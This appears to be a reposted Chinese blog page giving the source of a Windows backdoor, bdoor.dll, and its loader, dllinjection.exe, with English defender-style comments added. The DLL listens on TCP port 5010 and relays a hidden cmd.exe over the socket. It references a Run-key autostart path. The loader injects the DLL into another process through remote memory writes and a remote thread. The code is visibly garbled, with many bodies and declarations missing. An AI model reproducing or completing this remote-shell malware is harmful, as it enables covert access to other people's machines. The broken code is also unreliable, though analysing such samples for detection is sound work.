後門程式 示例

2021-05-21 15:07:00 字數 4982 閱讀 2837

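後門程式 bdoor 及原始碼,選自 amh 的 blog。以下包含兩份原始碼:第一份是 bdoor.dll(在 TCP 5010 埠監聽,並以管線把隱藏視窗的 cmd.exe 輸入輸出轉接到連線上);第二份應為載入器 dllinjection.exe(把 bdoor.dll 的路徑寫入目標行程並建立遠端執行緒)。注意:原始碼在轉貼時已被截斷,識別字全被轉成小寫,多數函式本體缺漏,無法直接編譯,僅供分析與偵測參考。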

#include "stdafx.h"

#include "winsock2.h"

#pragma comment(lib,"ws2_32")

// Indicators defined by this sample: the TCP port the listener binds to and
// the path of the Windows "Run" autostart key (the registry hive is not
// visible in this copy).
// NOTE(review): identifiers on this page were lower-cased and the "//"
// separators look like extraction damage of escaped backslashes; confirm
// against the original before matching on these strings.
#define port 5010

#define reg_run "software//microsoft//windows//currentversion//run"

// The body of threadparam is missing from this copy; later code reads its
// .sock and .handle members.
struct threadparam

;dword winapi controlthread(void *no);

dword winapi bdoor(void *lp);

dword winapi recvthread(void *lp);

dword winapi sendthread(void *lp);

dword winapi writereg(void *no);

// DLL entry point. Only the dll_process_detach case label and the final
// `return true` survive in this copy; the switch header and the attach case
// are missing, so what runs when the DLL is loaded cannot be confirmed here.
bool apientry dllmain( handle hmodule, 

dword  ul_reason_for_call, 

lpvoid lpreserved

)case dll_process_detach:

}return true;

}dword winapi controlthread(void *no)
// Listener thread: creates a TCP socket, binds it to every local address
// (s_addr = 0) on `port`, and listens with a backlog of 5.
// The Winsock start-up call, the error branches and the body of the
// while(true) loop are missing from this copy.
// Defender view: the artifact is a listening TCP socket on port 5010 owned by
// whichever process has this DLL loaded.

if((listensock=socket(af_inet,sock_stream,ipproto_tcp))==invalid_socket)

sockaddr_in localaddr,inaddr;

int addrlen=sizeof(inaddr);

// 0 == any local interface, so the port is reachable on all of them.
localaddr.sin_addr.s_un.s_addr=0;

localaddr.sin_family=af_inet;

localaddr.sin_port=htons(port);

if(bind(listensock,(sockaddr *)&localaddr,sizeof(localaddr))==socket_error)

listen(listensock,5);

// Loop body not present in this copy.
while(true)

closesocket(listensock);

::wsacleanup();

}dword winapi writereg(void *no)
// Builds the path "<system directory>" + separator + "dllinjection.exe" in
// syspath and takes its length; the declaration of syspath and the body of the
// while(true) loop are missing from this copy.
// NOTE(review): the function name and the reg_run define suggest the missing
// loop maintains an autostart value pointing at that path; this is not visible
// here, so confirm against the original.
// Defender view: an unexpected dllinjection.exe in the system directory, and a
// Run-key value referencing it, are the on-disk and registry artifacts to
// look for.

;int ret=::getsystemdirectory(syspath,max_path);

// Appends a separator only when the system directory does not already end
// with one.
if(syspath[ret-1]!='//')

strcat(syspath,"//");

strcat(syspath,"dllinjection.exe");

int len=strlen(syspath);

// Loop body not present in this copy.
while(true)

return 0;

}dword winapi bdoor(void *lp)
// Per-connection worker: creates two anonymous pipes, starts cmd.exe from the
// system directory with a hidden window and its standard handles bound to the
// pipes, then runs two relay threads that share the connection socket.
// The declarations of sec, the pipe handles and sock are missing from this
// copy, as is the branch taken when createprocess fails.
// Defender view: the process-creation artifact is a cmd.exe child with no
// visible window and pipe-backed stdin/stdout/stderr, parented by whichever
// process has this DLL loaded.

;sec.nlength=sizeof(sec);

sec.lpsecuritydescriptor=null;

// Inheritable handles, so the child process can use the pipe ends.
sec.binherithandle=true;

// Pipe 1: hwrite (parent side) -> hcmdin (child's stdin).
createpipe(&hcmdin,&hwrite,&sec,0);

// Pipe 2: hcmdout (child's stdout/stderr) -> hread (parent side).
createpipe(&hread,&hcmdout,&sec,0);

char cmddir[max_path]=;

::getsystemdirectory(cmddir,max_path);

if(cmddir[strlen(cmddir)-1]!='//')

strcat(cmddir,"//");

strcat(cmddir,"cmd.exe");

startupinfo startupinfo=;

startupinfo.cb=sizeof(startupinfo);

// Both the show-window and std-handle fields below are honoured.
startupinfo.dwflags=startf_useshowwindow|startf_usestdhandles;

// The child runs without a visible console window.
startupinfo.wshowwindow=sw_hide;

startupinfo.hstderror=startupinfo.hstdoutput=hcmdout;

startupinfo.hstdinput=hcmdin;

process_information processinfo=;

// Fifth argument true: the child inherits the inheritable pipe handles.
int ret=createprocess(cmddir,null,null,null,true,0,null,null,&startupinfo,&processinfo);

// Failure branch not present in this copy.
if(ret==0)

// The parent closes the child-side pipe ends.
closehandle(hcmdin);

closehandle(hcmdout);

dword id1,id2;

handle hrecvthread,hsendthread;

threadparam recvparam=,sendparam=;

// recvthread gets the socket and the pipe end feeding the child's stdin.
recvparam.sock=sock;

recvparam.handle=hwrite;

hrecvthread=createthread(null,0,recvthread,&recvparam,0,&id1);

// sendthread gets the socket and the pipe end carrying the child's output.
sendparam.sock=sock;

sendparam.handle=hread;

hsendthread=createthread(null,0,sendthread,&sendparam,0,&id2);

ulong code;

// Blocks until recvthread returns, then tears down the send thread and the
// child process and releases the socket and the remaining pipe handles.
::waitforsingleobject(hrecvthread,infinite);

::getexitcodethread(hsendthread,&code);

::terminatethread(hsendthread,code);

::getexitcodeprocess(processinfo.hprocess,&code);

::terminateprocess(processinfo.hprocess,code);

closesocket(sock);

closehandle(hwrite);

closehandle(hread);

return 0;

}dword winapi recvthread(void *lp)
// Socket-to-pipe relay: copies the threadparam it is given, reads from
// param.sock one byte per recv call, and writes the accumulated cmd buffer to
// param.handle with writefile, clearing 256 bytes of cmd afterwards.
// The declarations of temp and cmd, the bodies of the ret==0 / ret==1
// branches and the condition guarding the write are missing from this copy.

;threadparam param=*((threadparam *)lp);

while(1)

// Reads a single byte from the connection.
;int ret=recv(param.sock,temp,1,0);

// Branch body not present in this copy.
if(ret==0)

else if(ret==1)

ulong len;

// Forwards the buffered text to the pipe handle passed in by the caller.
::writefile(param.handle,cmd,strlen(cmd),&len,null);

memset(cmd,0,256);}}

}return 0;

}dword winapi sendthread(void *lp)
// Second relay thread started by bdoor with the socket and the hread pipe end.
// Only the loop header, a 100 ms sleep and the return survive in this copy;
// the work done on each iteration is missing and cannot be described from
// here.

;while(1)

sleep(100);

}return 0;

}#include "stdafx.h"

#include "windows.h"

#include "stdlib.h"

#include "tlhelp32.h"

#include "io.h"

long getprocessid(char *processname);

// Loader entry point: builds "<system directory>" + separator + "bdoor.dll",
// returns -1 if that file does not exist, then allocates memory in another
// process, writes the DLL path into it and starts a remote thread there with
// that address as the thread argument.
// The declaration of pdllpath and the lines that obtain hprocess and
// pthreadproc are missing from this copy, so the target process and the
// remote start routine cannot be confirmed from here.
// Defender view: the visible sequence is virtualallocex, writeprocessmemory,
// then createremotethread against another process, together with a bdoor.dll
// file in the system directory. Cross-process memory writes and remote thread
// creation are the behaviours endpoint telemetry should flag.
int apientry winmain(hinstance hinstance,

hinstance hprevinstance,

lpstr     lpcmdline,

int       ncmdshow)

;char *premoteaddr=null;

int ret=::getsystemdirectory(pdllpath,max_path);

if(pdllpath[ret-1]!='//')

strcat(pdllpath,"//");

strcat(pdllpath,"bdoor.dll");

// Existence check (mode 0); gives up if the DLL is not on disk.
if(::_access(pdllpath,0)==-1)

return -1;

// Read/write region in the remote process, sized for the path plus NUL.
premoteaddr=(char*)::virtualallocex(hprocess,null,strlen(pdllpath)+1,mem_commit,page_readwrite);

if(premoteaddr==null)

return -1;

// Copies the DLL path string into the remote region.
ret=::writeprocessmemory(hprocess,premoteaddr,pdllpath,strlen(pdllpath),null);

if(ret==0)

return -1;

// Remote thread receives the address of the path string as its argument.
handle hremotethread=::createremotethread(hprocess,null,0,pthreadproc,premoteaddr,0,null);

// Fixed 100 ms pause; in the visible lines the thread handle is neither
// waited on nor closed.
sleep(100);

::virtualfreeex(hprocess,premoteaddr,strlen(pdllpath)+1,mem_decommit);

::closehandle(hprocess);

return 0;

}long getprocessid(char *processname)
// Walks a process snapshot with process32first / process32next and returns
// pe32.th32processid when the flag g ends up equal to 1, otherwise -1.
// The creation of hsnapshot, the declaration of pe32 and the body of the
// do-loop (where g would be set) are missing from this copy.
// NOTE(review): the drive/dir/fname/ext buffers suggest each entry's
// executable path is split before being compared with processname; that
// comparison is not visible here, so confirm against the original.

; bool fret;

// dwsize must be set before the first enumeration call.
pe32.dwsize=sizeof(processentry32); 

fret=process32first(hsnapshot,&pe32); 

if(!fret) 

return -1;

// Match flag; only the value 1 is treated as success below.
int g=0;

char drive[_max_drive]=;

char dir[_max_dir]=;

char fname[_max_fname]=;

char ext[_max_ext]=;

// Loop body not present in this copy.
do }while(process32next(hsnapshot,&pe32));

if(g!=1)

return -1;

return pe32.th32processid;

}
